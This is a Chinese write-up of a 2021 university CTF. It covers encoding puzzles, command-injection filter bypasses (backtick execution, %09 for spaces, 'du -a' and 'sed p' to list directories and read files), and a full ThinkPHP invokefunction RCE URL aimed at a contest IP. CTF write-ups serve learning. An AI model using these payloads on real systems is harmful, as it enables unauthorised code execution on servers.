首届安徽省“追日杯”大学生网络安全挑战赛-wp
混了个三等奖,奖状至今未发(主办方跑路了。。。)
MISC
checkin
flag{welcome_to_zrb@2021}
阵法的奥秘
提示是8进制,观察到最后的数字是变化的
1 |
|
先提取出来
与最小的76取余后转字符串
最后两层base64
1 |
|
偷走的flag
解压得到这是一个地址.txt
和纸条.rar
小明去食堂吃饭,为了能在吃饭的时候有座位,他把自己的耳机和手机充电器放在桌子上。买饭回来后发现自己的东西不见了。以为被收走了。就去失物招领处询问。询问无果后,在QQ空间发现自己被挂了,说自己给学校丢人,用充电器占座,并把充电器放到了指定位置。小明找到以后发现了一串密文,只有解开密文,才能找到充电器的位置。你能帮助小明发现充电器被藏到哪里了吗。
密文如下:%E2%A1%96%E2%A1%9C%E2%A1%91%E2%A1%97%E2%A1%8B%E2%A1%B1%E2%A1%83%E2%A0%81%E2%A1%94%E2%A1%95%E2%A1%AF%E2%A1%B6%E2%A1%82%E2%A1%9F%E2%A1%9D%E2%A1%AF%E2%A1%99%E2%A1%9D%E2%A1%80%E2%A1%9C%E2%A1%95%E2%A1%9D%3D
很明显的url编码,解密后得到⡖⡜⡑⡗⡋⡱⡃⠁⡔⡕⡯⡶⡂⡟⡝⡯⡙⡝⡀⡜⡕⡝=
盲文编码,在线解密得到flag{As1de_From_implem
用这个作为压缩包密码解压
恭喜你帮助小明找到充电器。但是他的耳机也不见了。通过查询监控发现耳机与充电器一起被拿走了。当他发现耳机时,只剩下一个进水的耳机、一摊水渍和一个被揉搓了好几遍的纸条,上面字迹已经被污染了,但隐约写着:********-I_forg1ve_y0u}。你能帮助小明发现被隐藏的字样吗。
vim中看到U+202C
等字符,为0宽加密
解密得到3ntat1on
最后拼接在一起,注意别把0宽字符复制进去flag{As1de_From_implem3ntat1on-I_forg1ve_y0u}
chess
全自动解密脚本
最后一关手动解即可
1 |
|
WEB
gotofly
观察重定向
看运气出flag
2_let_me_rce
1 |
|
当时一打开就被这过滤吓住了,随便试了下就放弃了,赛后想想应该坚持一下,不要放弃
看了wp学到了很多新的知识
比如du
命令也能列目录,用sed p
读文件
赛后复现:
没有过滤反引号和单双引号
列目录方法1:
先用单引号闭合,然后反引号执行命令,空格用%09
绕过
1 |
|
列目录方法2:
使用du -a /
命令
1 |
|
读文件方法1:
原理与列目录方法1一致
1 |
|
读文件方法2:
使用sed p
命令
1 |
|
伊泽瑞尔的php
赛后复现
WHT战队的exp
1 |
|
综合渗透
综合渗透-FLAG1
thinkphp框架
简单一扫没有过滤且未修复漏洞
用公开的payload打http://82.156.76.152:8077/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls